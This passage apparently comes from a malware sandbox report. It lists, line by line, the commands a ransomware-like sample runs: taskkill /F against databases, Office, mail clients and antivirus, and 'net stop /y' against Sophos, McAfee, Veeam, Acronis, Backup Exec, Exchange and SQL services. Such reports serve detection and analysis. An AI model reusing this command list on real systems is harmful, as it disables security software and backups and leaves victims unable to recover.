- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:788

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:568

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1552

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:992

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1952

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:660

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2148

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
PID:2440

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2520

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM oracle.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2620

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2684

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2812

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2888

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2984

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3020

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2424

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2696

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2440

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM visio.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2972

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM winword.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3240

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3356

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3416

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3492

C:\Windows\System32\taskkill.exe
"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3524

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y
2⤵
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Acronis VSS Provider" /y
3⤵
PID:3760

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y
2⤵
PID:3640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Enterprise Client Service" /y
3⤵
PID:3852

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Agent" /y
2⤵
PID:3696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Agent" /y
3⤵
PID:3880

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y
2⤵
PID:3744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y
3⤵
PID:3972

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y
2⤵
PID:3808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Clean Service" /y
3⤵
PID:3948

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y
2⤵
PID:3864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Device Control Service" /y
3⤵
PID:4052

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y
2⤵
PID:3924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y
3⤵
PID:4024

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Health Service" /y
2⤵
PID:3992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Health Service" /y
3⤵
PID:3088

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y
2⤵
PID:4040

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Agent" /y
3⤵
PID:3464

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y
2⤵
PID:4092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Client" /y
3⤵
PID:3684

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Message Router" /y
2⤵
PID:3300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Message Router" /y
3⤵
PID:3776

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y
2⤵
PID:3556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Safestore Service" /y
3⤵
PID:3980

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y
2⤵
PID:3636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos System Protection Service" /y
3⤵
PID:3700

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y
2⤵
PID:3764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Web Control Service" /y
3⤵
PID:3892

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y
2⤵
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y
3⤵
PID:3868

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y
2⤵
PID:3860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y
3⤵
PID:3912

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AcrSch2Svc /y
2⤵
PID:3808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
3⤵
PID:3880

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop AcronisAgent /y
2⤵
PID:4056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:3720

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y
2⤵
PID:4012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y
3⤵
PID:3800

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop Antivirus /y
2⤵
PID:3924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
3⤵
PID:3856

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y
2⤵
PID:3956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec System Recovery" /y
3⤵
PID:3824

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ARSM /y
2⤵
PID:3748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
3⤵
PID:3768

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:4068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:3980

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:3164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3⤵
PID:3932

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y
2⤵
PID:3208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
3⤵
PID:3720

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y
2⤵
PID:3284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
3⤵
PID:3956

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecManagementService /y
2⤵
PID:3692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
3⤵
PID:3980

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecRPCService /y
2⤵
PID:3200

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:3464

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y
2⤵
PID:3852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:3956

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop bedbg /y
2⤵
PID:3760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
3⤵
PID:3816

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop DCAgent /y
2⤵
PID:3764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
3⤵
PID:3980

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EPSecurityService /y
2⤵
PID:3636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
3⤵
PID:3164

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EPUpdateService /y
2⤵
PID:3904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
3⤵
PID:3400

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EraserSvc11710 /y
2⤵
PID:4076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
3⤵
PID:3952

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop EsgShKernel /y
2⤵
PID:3864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
3⤵
PID:3912

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop FA_Scheduler /y
2⤵
PID:3616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
3⤵
PID:4072

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop IISAdmin /y
2⤵
PID:3992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
3⤵
PID:3956

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop IMAP4Svc /y
2⤵
PID:3812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IMAP4Svc /y
3⤵
PID:4044

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop macmnsvc /y
2⤵
PID:4016

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
3⤵
PID:4052

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop masvc /y
2⤵
PID:4092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
3⤵
PID:3928

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MBAMService /y
2⤵
PID:3696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
3⤵
PID:4088

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MBEndpointAgent /y
2⤵
PID:3872

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
3⤵
PID:3284

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeEngineService /y
2⤵
PID:3832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
3⤵
PID:4056

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeFramework /y
2⤵
PID:3848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
3⤵
PID:3900

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y
2⤵
PID:3736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:3368

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McShield /y
2⤵
PID:4056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
3⤵
PID:3936

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop McTaskManager /y
2⤵
PID:3768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
3⤵
PID:3948

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfemms /y
2⤵
PID:3744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
3⤵
PID:3856

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mfevtp /y
2⤵
PID:4008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
3⤵
PID:3924

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MMS /y
2⤵
PID:3556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MMS /y
3⤵
PID:3800

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop mozyprobackup /y
2⤵
PID:3640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
3⤵
PID:4140

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer /y
2⤵
PID:3996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
3⤵
PID:4256

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer100 /y
2⤵
PID:3860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
3⤵
PID:4556

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MsDtsServer110 /y
2⤵
PID:3704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
3⤵
PID:4780

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeES /y
2⤵
PID:4068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
3⤵
PID:3556

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeIS /y
2⤵
PID:4048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
3⤵
PID:3980

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y
2⤵
PID:2468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
3⤵
PID:4868

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeMTA /y
2⤵
PID:3620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
3⤵
PID:3164

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeSA /y
2⤵
PID:3368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
3⤵
PID:4076

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSExchangeSRS /y
2⤵
PID:4024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
3⤵
PID:4452

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$SQL_2008 /y
2⤵
PID:3848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
3⤵
PID:3696

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$SYSTEM_BGC /y
2⤵
PID:3780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:3556

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y
2⤵
PID:4000

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
3⤵
PID:3540

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y
2⤵
PID:3992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
3⤵
PID:3800

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y
2⤵
PID:4028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
3⤵
PID:3952

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y
2⤵
PID:3720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
3⤵
PID:3768

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y
2⤵
PID:4052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
3⤵
PID:4156

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y
2⤵
PID:3840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
3⤵
PID:3096

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y
2⤵
PID:4044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
3⤵
PID:4192

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y
2⤵
PID:3684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
3⤵
PID:4200

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y
2⤵
PID:3804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
3⤵
PID:4316

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y
2⤵
PID:3884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
3⤵
PID:4356

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y
2⤵
PID:3972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
3⤵
PID:4388

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$TPS /y
2⤵
PID:3384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
3⤵
PID:4436

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y
2⤵
PID:3708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
3⤵
PID:4464

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:3620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:4532

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y
2⤵
PID:3668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:4624

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y
2⤵
PID:3672

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher /y
3⤵
PID:4156

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
2⤵
PID:3836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:4680

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
2⤵
PID:3648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:4744

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
2⤵
PID:4120

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:4844

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SQL_2008 /y
2⤵
PID:4160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:4708

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
2⤵
PID:4180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:4936

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPS /y
2⤵
PID:4228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
3⤵
PID:4392

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$TPSAMA /y
2⤵
PID:4244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:5060

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLSERVER /y
2⤵
PID:4272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
3⤵
PID:5036

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y
2⤵
PID:4304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
3⤵
PID:4068

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y
2⤵
PID:4324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
3⤵
PID:5052

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MySQL80 /y
2⤵
PID:4364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
3⤵
PID:3968

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop MySQL57 /y
2⤵
PID:4376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
3⤵
PID:4012

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ntrtscan /y
2⤵
PID:4404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
3⤵
PID:4000

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop OracleClientCache80 /y
2⤵
PID:4420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
3⤵
PID:4332

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop PDVFSService /y
2⤵
PID:4444

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:3888

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop POP3Svc /y
2⤵
PID:4472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
3⤵
PID:4056

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer /y
2⤵
PID:4488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
3⤵
PID:4412

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:4508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
3⤵
PID:4140

C:\Windows\System32\net.exe
"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y
2⤵
PID:4540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
3⤵
PID:4080

C:\Windows\System32\net.exe
